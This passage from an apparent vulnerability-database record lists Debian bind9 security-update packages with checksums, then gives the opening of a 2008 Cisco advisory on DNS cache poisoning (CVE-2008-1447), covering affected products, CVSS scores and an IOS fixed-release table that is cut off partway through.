http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch3_i386.deb\n Size/MD5 checksum: 206330 a22fb6cb47d6e449007d665b9e6d8c52\n http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch3_i386.deb\n Size/MD5 checksum: 113162 b9bc5fa7f96313235a53ab6fd819b58b\n http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch3_i386.deb\n Size/MD5 checksum: 472708 9edfb07c186a93aea1a2e602e0ee6335\n http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch3_i386.deb\n Size/MD5 checksum: 94822 d2fc00416dc090a535b280f48eee7f46\n http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch3_i386.deb\n Size/MD5 checksum: 169930 47c43c9738afb7ed72618930dc702ed3\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch3_i386.deb\n Size/MD5 checksum: 296722 dd1979969210386fc36d119e19e12cc2\n 
http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch3_i386.deb\n Size/MD5 checksum: 996528 56db22ee21e053443e72ccd11a25181b\n http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch3_i386.deb\n Size/MD5 checksum: 110134 5491e4e33e43f1300840b62947690b7a\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch3_ia64.deb\n Size/MD5 checksum: 232052 eb9215cb2ba71ded815b4ca6f0ac0744\n http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch3_ia64.deb\n Size/MD5 checksum: 99978 ceee4c1dc16fdf2d7fefe1aee6d8dd85\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch3_ia64.deb\n Size/MD5 checksum: 393324 553b67ca638482db8e1586d231f03abe\n http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch3_ia64.deb\n Size/MD5 checksum: 740264 a30c98b25296a147d47d7f44c8418883\n http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch3_ia64.deb\n Size/MD5 checksum: 127606 33d62368c2ce437e660708eb6b0ffe2b\n http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch3_ia64.deb\n Size/MD5 checksum: 216344 0a0b33f34dbeb744bd8af8ad8388048f\n http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch3_ia64.deb\n Size/MD5 checksum: 125806 3aafce71b9e4ecaf01602c409a355b54\n http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch3_ia64.deb\n Size/MD5 checksum: 1584302 d982b4443c38056cdeb80b327ee36f3a\n http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch3_ia64.deb\n Size/MD5 checksum: 117782 ae8ae735a8054ff473d305b06c90c68a\n http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch3_ia64.deb\n Size/MD5 checksum: 102432 4443f6e43cc1e4c7448965a0501bfe54\n http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch3_ia64.deb\n Size/MD5 checksum: 280866 c20244c3a06177b934ac804b382b85c7\n\nmips architecture (MIPS (Big Endian))\n\n 
http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch3_mips.deb\n Size/MD5 checksum: 174012 cf61e15aa7c79b40ae94a3c1d08ba496\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch3_mips.deb\n Size/MD5 checksum: 301476 4094fd919da162322ea07d62378cc664\n http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch3_mips.deb\n Size/MD5 checksum: 110326 be73e626902012ca986d4192804017e7\n http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch3_mips.deb\n Size/MD5 checksum: 180490 dde7f37a0a2456190461f5f26bf30ab6\n http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch3_mips.deb\n Size/MD5 checksum: 1229398 37af92bf5074d9a260fd4ff5346dc4b8\n http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch3_mips.deb\n Size/MD5 checksum: 211386 8083484e19ebc9099022954350c6baf7\n http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch3_mips.deb\n Size/MD5 checksum: 94992 46f858e2ed33a864539476d25bd9b44f\n http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch3_mips.deb\n Size/MD5 checksum: 94230 6bfa6b8d78c46567a341f6174f9aa874\n http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch3_mips.deb\n Size/MD5 checksum: 491862 fc2d747a29c0116da5936b4964ef8146\n http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch3_mips.deb\n Size/MD5 checksum: 113268 58fb17d2ee0415e13fdad4727534b6cc\n http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch3_mips.deb\n Size/MD5 checksum: 107912 5834642a56bb9548510f8cd0a3ae766f\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch3_mipsel.deb\n Size/MD5 checksum: 299514 0b5de102f7ddf83d497498b320613556\n http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch3_mipsel.deb\n Size/MD5 checksum: 488260 7b85b99ea5c24f74e531bbd9056672e9\n 
http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch3_mipsel.deb\n Size/MD5 checksum: 1205384 a3211957988d4aaae40776ff41cf6a01\n http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch3_mipsel.deb\n Size/MD5 checksum: 113016 dddd0a37c778cd68696318a7adc1abcd\n http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch3_mipsel.deb\n Size/MD5 checksum: 110254 6754bc57fcac807b5569531f7e821802\n http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch3_mipsel.deb\n Size/MD5 checksum: 174148 23e91bbb42a44ca80535079660813277\n http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch3_mipsel.deb\n Size/MD5 checksum: 179630 fa26c51aa248cb502ac54544bdd6ced0\n http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch3_mipsel.deb\n Size/MD5 checksum: 210904 21784fc7019a384e78ecc94a10f4e315\n http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch3_mipsel.deb\n Size/MD5 checksum: 94936 2068abe2f2e78675ad94ea28579efc87\n http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch3_mipsel.deb\n Size/MD5 checksum: 107166 2cfce41a4fc41aa9986cdef01e09705d\n http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch3_mipsel.deb\n Size/MD5 checksum: 94098 c95a157cfa3feef62450afdef3fe65a8\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch3_powerpc.deb\n Size/MD5 checksum: 173606 9618a781d59f94f751e18db86cf6b948\n http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch3_powerpc.deb\n Size/MD5 checksum: 112276 e786724068250eb53c475a3e51035d51\n http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch3_powerpc.deb\n Size/MD5 checksum: 113842 4961da1e75c17f3f00621acfc06d10fe\n http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch3_powerpc.deb\n Size/MD5 checksum: 488428 b777fc3fe13b319817f955f116b40e83\n 
http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch3_powerpc.deb\n Size/MD5 checksum: 1167832 75f402f7bf328da5deee364f4266558d\n http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch3_powerpc.deb\n Size/MD5 checksum: 96204 57ec688c7f24161e347054dc93fbd757\n http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch3_powerpc.deb\n Size/MD5 checksum: 96170 77d5b9189a05f2b3dca7901bff6e56df\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch3_powerpc.deb\n Size/MD5 checksum: 301276 dddf71278c1f4afbbc49019248f4328e\n http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch3_powerpc.deb\n Size/MD5 checksum: 109288 8fd2b3005fcf95e3616ec8a77b3ad322\n http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch3_powerpc.deb\n Size/MD5 checksum: 183310 b9eb85b58aaf29a3106d16410c0d379a\n http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch3_powerpc.deb\n Size/MD5 checksum: 206830 b286690dde8d1412c2de3fa99f7d3c5b\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch3_s390.deb\n Size/MD5 checksum: 114234 23a30b0e26db0210a1be48c4d44b6d7f\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch3_s390.deb\n Size/MD5 checksum: 331864 7c3fab929f1e29873ecfc7c7c4b52ddc\n http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch3_s390.deb\n Size/MD5 checksum: 116656 8abeeeb22e800f63e4b30e0c2dd974e0\n http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch3_s390.deb\n Size/MD5 checksum: 1137342 820a17acdc24ef1dd0c1db7b8e6fc470\n http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch3_s390.deb\n Size/MD5 checksum: 233948 635487d4e6ea4d15704bb14b8cf9236c\n http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch3_s390.deb\n Size/MD5 checksum: 196598 2198086ee8c358aa3ed5046708a31f45\n 
http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch3_s390.deb\n Size/MD5 checksum: 194704 c897d956b11161ae8e31e4bffb489883\n http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch3_s390.deb\n Size/MD5 checksum: 118140 e5e11d59852a32dcd1b78b4aabd22fff\n http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch3_s390.deb\n Size/MD5 checksum: 95664 050d558c3d06e520fb4e6c6cebd520c3\n http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch3_s390.deb\n Size/MD5 checksum: 579484 6fc80f5cde0c2d01b49ae53f027eeecc\n http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch3_s390.deb\n Size/MD5 checksum: 97786 5dda64259aa80e1c2e085e7fc2430299\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch3_sparc.deb\n Size/MD5 checksum: 300090 21095a9477d8db8bdbca300235ddc296\n http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch3_sparc.deb\n Size/MD5 checksum: 210606 8bd074b427b5f732c5584ca265bb2c28\n http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch3_sparc.deb\n Size/MD5 checksum: 1121664 2750abf3a8e3ffa54d1b15f6a5b6738e\n http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch3_sparc.deb\n Size/MD5 checksum: 94822 4e2634cf2561a237174a6863377b24cd\n http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch3_sparc.deb\n Size/MD5 checksum: 175248 4231a2791083fc82977535613d38ef2a\n http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch3_sparc.deb\n Size/MD5 checksum: 184036 aea98952994fb97c74df02ae4ed2f28d\n http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch3_sparc.deb\n Size/MD5 checksum: 107574 b6a3a3204c134d54dce2d8d79f77f647\n http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch3_sparc.deb\n Size/MD5 checksum: 493628 b5c5a9638091fd0d6543a405bfdefd53\n 
http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch3_sparc.deb\n Size/MD5 checksum: 94828 4657a6a42f7f2fac5ef96d273e9de4df\n http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch3_sparc.deb\n Size/MD5 checksum: 114258 32f88744a6e6e648377dda42ff910cbb\n http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch3_sparc.deb\n Size/MD5 checksum: 111158 a59dbf1edb5518b09b2993049922c01a\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 9, "modified": "2008-07-08T17:03:22", "published": "2008-07-08T17:03:22", "id": "DEBIAN:DSA-1603-1:C7E04", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2008/msg00184.html", "title": "[SECURITY] [DSA 1603-1] New bind9 packages fix cache poisoning", "type": "debian", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:26", "bulletinFamily": "software", "cvelist": ["CVE-2008-1447"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nCisco Security Advisory: Multiple Cisco Products Vulnerable to DNS Cache\r\nPoisoning Attacks\r\n\r\nAdvisory ID: cisco-sa-20080708-dns\r\n\r\nhttp://www.cisco.com/warp/public/707/cisco-sa-20080708-dns.shtml\r\n\r\nRevision 1.0\r\n\r\nFor Public Release 2008 July 08 1800 UTC (GMT)\r\n\r\nSummary\r\n=======\r\n\r\nMultiple Cisco products are vulnerable to DNS cache poisoning attacks\r\ndue to their use of insufficiently randomized DNS transaction IDs and\r\nUDP source ports in the DNS queries that they produce, which 
may allow\r\nan attacker to more easily forge DNS answers that can poison DNS caches.\r\n\r\nTo exploit this vulnerability an attacker must be able to cause a\r\nvulnerable DNS server to perform recursive DNS queries. Therefore, DNS\r\nservers that are only authoritative, or servers where recursion is not\r\nallowed, are not affected.\r\n\r\nCisco has released free software updates that address this vulnerability.\r\n\r\nThis advisory is posted at\r\nhttp://www.cisco.com/warp/public/707/cisco-sa-20080708-dns.shtml.\r\n\r\nThis security advisory is being published simultaneously with\r\nannouncements from other affected organizations.\r\n\r\nAffected Products\r\n=================\r\n\r\nProducts that cache DNS responses and process DNS messages with the\r\nrecursion desired (RD) flag set may be vulnerable to a DNS cache\r\npoisoning attack depending on implementation of the DNS protocol.\r\nProducts that process DNS messages with the RD flag set will attempt to\r\nanswer the question asked on behalf of the client. A product is only\r\naffected if using a vulnerable implementation of the DNS protocol, the\r\nDNS server functionality for the product is enabled, and the DNS feature\r\nfor the product is configured to process recursive DNS query messages.\r\n\r\nVulnerable Products\r\n+------------------\r\n\r\nThe following Cisco products are capable of acting as DNS servers and\r\nhave been found to have the DNS implementation weakness that makes some\r\ntypes of DNS cache poisoning attacks more likely to succeed:\r\n\r\n * Cisco IOS Software\r\n\r\n A device that is running Cisco IOS Software will be affected if it\r\n is running a vulnerable version and if it is acting as a DNS server.\r\n\r\n All Cisco IOS Software releases that support the DNS server\r\n functionality and that have not had their DNS implementation\r\n improved are affected. 
For information about specific fixed\r\n versions, please refer to the Software Versions and Fixes section.\r\n\r\n A device that is running Cisco IOS Software is configured to act\r\n as a DNS server if the command "ip dns server" is present in the\r\n configuration. This command is not enabled by default.\r\n\r\n * Cisco Network Registrar\r\n\r\n All Cisco Network Registrar versions are affected, and DNS services\r\n are enabled by default.\r\n\r\n The DNS server on CNR is enabled via the command-line interface\r\n (CLI) commands "server dns enable start-on-reboot" or "dns enable\r\n start-on-reboot" or via the web management interface in the Servers\r\n page by selecting the appropriate "Start," "Stop," or "Reload"\r\n button.\r\n\r\n * Cisco Application and Content Networking System\r\n\r\n All Cisco Application and Content Networking System (ACNS) versions\r\n are affected; DNS services are disabled by default.\r\n\r\n ACNS is configured to act as a DNS server if the command\r\n "dns enable" is present in the configuration.\r\n\r\n * Cisco Global Site Selector Used in Combination with Cisco Network\r\n Registrar\r\n\r\n The Cisco Global Site Selector (GSS) is affected when it is used in\r\n combination with Cisco Network Registrar software to provide a more\r\n complete DNS solution. Fixed software would come in the form of an\r\n update of the Cisco Network Registrar software rather than an update\r\n of the GSS software.\r\n\r\nProducts Confirmed Not Vulnerable\r\n+--------------------------------\r\n\r\nProducts that do not offer DNS server capabilities are not affected by\r\nthis vulnerability.\r\n\r\nThe Cisco GSS by itself is not affected by this vulnerability. 
However,\r\nit is affected when it is used with Cisco Network Registrar software.\r\n\r\nNo other Cisco products are currently known to be affected by these\r\nvulnerabilities.\r\n\r\nDetails\r\n=======\r\n\r\nThe Domain Name System is an integral part of networks that are based\r\non TCP/IP such as the Internet. Simply stated, the Domain Name System\r\nis a hierarchical database that contains mappings of hostnames and IP\r\naddresses. The DNS protocol is part of the TCP/IP protocol suite and\r\nallows DNS clients to query the DNS database to resolve hostnames to IP\r\naddresses.\r\n\r\nA DNS server is an application that implements the DNS protocol and that\r\nhas the ability to respond to queries made by DNS clients. When handling\r\na query from a DNS client, a DNS server can look into its portion of the\r\nglobal DNS database (if the query is for a portion of the DNS database\r\nfor which the DNS server is authoritative), or it can relay the query\r\nto other DNS servers (if it is configured to do so and if the query\r\nis for a portion of the DNS database for which the DNS server is not\r\nauthoritative.)\r\n\r\nBecause of the processing time and bandwidth that is associated with\r\nhandling a DNS query, most DNS servers locally store responses that\r\nare received from other DNS servers. The area where these responses\r\nare stored locally is called a "cache." Once a response is stored in a\r\ncache, the DNS server can use the locally stored response for a certain\r\ntime (called the "time to live") before having to query DNS servers\r\nagain to refresh the local (cached) copy of the response.\r\n\r\nA DNS cache poisoning attack is an attack in which an entry in the\r\nDNS cache of a DNS server is changed so the IP address associated\r\nwith a hostname in the cache does not point to the correct place. 
For\r\nexample, if www.example.com is mapped to the IP address 192.168.0.1\r\nand this mapping is present in the cache of a DNS server, an attacker\r\nwho succeeds in poisoning the DNS cache of this server may be able to\r\nmap www.example.com to 10.0.0.1 instead. If this happens, a user who\r\nis trying to visit www.example.com may end up contacting the wrong web\r\nserver.\r\n\r\nAlthough DNS cache poisoning attacks are not new, a security researcher\r\nrecently presented a technique that allows an attacker to mount\r\nsuccessful DNS cache poisoning attacks with low complexity tools and\r\nlow traffic requirements. This technique exploits a weakness in most\r\nimplementations of the DNS protocol. The fundamental implementation\r\nweakness is that the DNS transaction ID and source port number used to\r\nvalidate DNS responses are not sufficiently randomized and can easily\r\nbe predicted, which allows an attacker to create forged responses to\r\nDNS queries that will match the expected values. The DNS server will\r\nconsider such responses to be valid.\r\n\r\nThe following Cisco products that offer DNS server functionality have\r\nbeen found to be susceptible to DNS cache poisoning attacks:\r\n\r\n * Cisco IOS Software: The vulnerability documented in Cisco bug ID\r\n CSCso81854.\r\n\r\n * Cisco Network Registrar: The vulnerability documented in Cisco\r\n bug ID CSCsq01298.\r\n\r\n * Cisco Application and Content Networking System (ACNS): The\r\n vulnerability documented in Cisco bug ID CSCsq21930.\r\n\r\nThis vulnerability has been assigned Common Vulnerabilities and\r\nExposures (CVE) ID CVE-2008-1447.\r\n\r\nVulnerability Scoring Details\r\n+----------------------------\r\n\r\nCisco has provided scores for the vulnerabilities in this advisory based\r\non the Common Vulnerability Scoring System (CVSS). 
The CVSS scoring in\r\nthis Security Advisory is done in accordance with CVSS version 2.0.\r\n\r\nCVSS is a standards-based scoring method that conveys vulnerability\r\nseverity and helps determine urgency and priority of response.\r\n\r\nCisco has provided a base and temporal score. Customers can then\r\ncompute environmental scores to assist in determining the impact of the\r\nvulnerability in individual networks.\r\n\r\nCisco has provided an FAQ to answer additional questions regarding CVSS\r\nat\r\n\r\nhttp://www.cisco.com/web/about/security/intelligence/cvss-qandas.html\r\n\r\nCisco has also provided a CVSS calculator to help compute the\r\nenvironmental impact for individual networks at\r\n\r\nhttp://intellishield.cisco.com/security/alertmanager/cvss\r\n\r\nCisco Bugs:\r\n\r\n* DNS cache prone to poisoning/forged answers attacks (CSCsq21930)\r\n\r\n* DNS susceptible to forged query response attacks (CSCsq01298)\r\n\r\n* Need to make DNS implementation more resilient against forged answers\r\n(CSCso81854)\r\n\r\nCVSS Base Score - 6.4\r\n Access Vector - Network\r\n Access Complexity - Low\r\n Authentication - None\r\n Confidentiality Impact - None\r\n Integrity Impact - Partial\r\n Availability Impact - Partial\r\n\r\nCVSS Temporal Score - 5.3\r\n Exploitability - Functional\r\n Remediation Level - Official-Fix\r\n Report Confidence - Confirmed\r\n\r\n(same score for the three Cisco bugs listed above.)\r\n\r\nImpact\r\n======\r\n\r\nSuccessful exploitation of the vulnerability described in this document\r\nmay result in invalid hostname-to-IP address mappings in the cache of an\r\naffected DNS server. This may lead users of this DNS server to contact\r\nthe wrong provider of network services. 
The ultimate impact varies\r\ngreatly, ranging from a simple denial of service (for example, making\r\nwww.example.com resolve to 127.0.0.1) to phishing and financial fraud.\r\n\r\nSoftware Versions and Fixes\r\n===========================\r\n\r\nWhen considering software upgrades, also consult\r\nhttp://www.cisco.com/go/psirt and any subsequent advisories to determine\r\nexposure and a complete upgrade solution.\r\n\r\nIn all cases, customers should exercise caution to be certain the\r\ndevices to be upgraded contain sufficient memory and that current\r\nhardware and software configurations will continue to be supported\r\nproperly by the new release. If the information is not clear, contact\r\nthe Cisco Technical Assistance Center (TAC) or your contracted\r\nmaintenance provider for assistance.\r\n\r\nCisco IOS Software\r\n+-----------------\r\n\r\nEach row of the Cisco IOS Software table (below) names a Cisco IOS\r\nSoftware release train. If a given release train is vulnerable, then\r\nthe earliest possible releases that contain the fix (along with the\r\nanticipated date of availability for each, if applicable) are listed in\r\nthe "First Fixed Release" column of the table. The "Recommended Release"\r\ncolumn indicates the releases which have fixes for all the published\r\nvulnerabilities at the time of this Advisory. A device running a release\r\nin the given train that is earlier than the release in a specific column\r\n(less than the First Fixed Release) is known to be vulnerable. 
Cisco\r\nrecommends upgrading to a release equal to or later than the release in\r\nthe "Recommended Releases" column of the table.\r\n\r\n+----------------------------------------+\r\n| Major | Availability of |\r\n| Release | Repaired Releases |\r\n|------------+---------------------------|\r\n| Affected | First Fixed | Recommended |\r\n| 12.0-Based | Release | Release |\r\n| Releases | | |\r\n|------------+-------------+-------------|\r\n| 12.0 | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.0DA | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| | Releases | |\r\n| | prior to | |\r\n| | 12.0(7)DB | |\r\n| | are | |\r\n| | vulnerable, | 12.4(19a) |\r\n| 12.0DB | release | |\r\n| | 12.0(7)DB | 12.4(19b) |\r\n| | and later | |\r\n| | are not | |\r\n| | vulnerable; | |\r\n| | first fixed | |\r\n| | in 12.4 | |\r\n|------------+-------------+-------------|\r\n| | Releases | |\r\n| | prior to | |\r\n| | 12.0(7)DC | |\r\n| | are | |\r\n| | vulnerable, | 12.4(19a) |\r\n| 12.0DC | release | |\r\n| | 12.0(7)DC | 12.4(19b) |\r\n| | and later | |\r\n| | are not | |\r\n| | vulnerable; | |\r\n| | first fixed | |\r\n| | in 12.4 | |\r\n|------------+-------------+-------------|\r\n| 12.0S | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.0SC | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.0SL | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.0SP | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.0ST | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.0SX | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.0SY | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.0SZ | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 
12.4(19a) |\r\n| 12.0T | first fixed | |\r\n| | in 12.4 | 12.4(19b) |\r\n|------------+-------------+-------------|\r\n| 12.0W | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.0WC | Vulnerable; | |\r\n| | contact TAC | |\r\n|------------+-------------+-------------|\r\n| 12.0WT | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.0XA | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.0XB | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.0XC | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.0XD | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| | Note: | |\r\n| | Releases | |\r\n| | prior to | |\r\n| | 12.0(7)XE1 | |\r\n| | are | |\r\n| 12.0XE | vulnerable, | |\r\n| | release | |\r\n| | 12.0(7)XE1 | |\r\n| | and later | |\r\n| | are not | |\r\n| | vulnerable; | |\r\n|------------+-------------+-------------|\r\n| 12.0XF | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.0XG | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.0XH | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.0XI | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.0XJ | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| | Releases | |\r\n| | prior to | |\r\n| | 12.0(7)XK2 | |\r\n| | are | |\r\n| | vulnerable, | 12.4(19a) |\r\n| 12.0XK | release | |\r\n| | 12.0(7)XK2 | 12.4(19b) |\r\n| | and later | |\r\n| | are not | |\r\n| | vulnerable; | |\r\n| | first fixed | |\r\n| | in 12.4 | |\r\n|------------+-------------+-------------|\r\n| 12.0XL | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.0XM | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.0XN | Not | 
|\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.0XQ | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| | Releases | |\r\n| | prior to | |\r\n| | 12.0(7)XR1 | |\r\n| | are | |\r\n| | vulnerable, | 12.4(19a) |\r\n| 12.0XR | release | |\r\n| | 12.0(7)XR1 | 12.4(19b) |\r\n| | and later | |\r\n| | are not | |\r\n| | vulnerable; | |\r\n| | first fixed | |\r\n| | in 12.4 | |\r\n|------------+-------------+-------------|\r\n| 12.0XS | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.0XV | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.0XW | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| Affected | First Fixed | Recommended |\r\n| 12.1-Based | Release | Release |\r\n| Releases | | |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(19a) |\r\n| 12.1 | first fixed | |\r\n| | in 12.4 | 12.4(19b) |\r\n|------------+-------------+-------------|\r\n| 12.1AA | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.1AX | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| | Releases | |\r\n| | prior to | |\r\n| | 12.1(22)AY1 | |\r\n| | are | |\r\n| 12.1AY | vulnerable, | 12.1(22) |\r\n| | release | EA11 |\r\n| | 12.1(22)AY1 | |\r\n| | and later | |\r\n| | are not | |\r\n| | vulnerable; | |\r\n|------------+-------------+-------------|\r\n| 12.1AZ | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.1CX | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.1DA | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| | Releases | |\r\n| | prior to | |\r\n| | 12.1(4)DB1 | |\r\n| | are | |\r\n| | vulnerable, | 12.4(19a) |\r\n| 12.1DB | release | |\r\n| | 12.1(4)DB1 | 12.4(19b) |\r\n| | and later | |\r\n| | are not | |\r\n| | vulnerable; | |\r\n| | first 
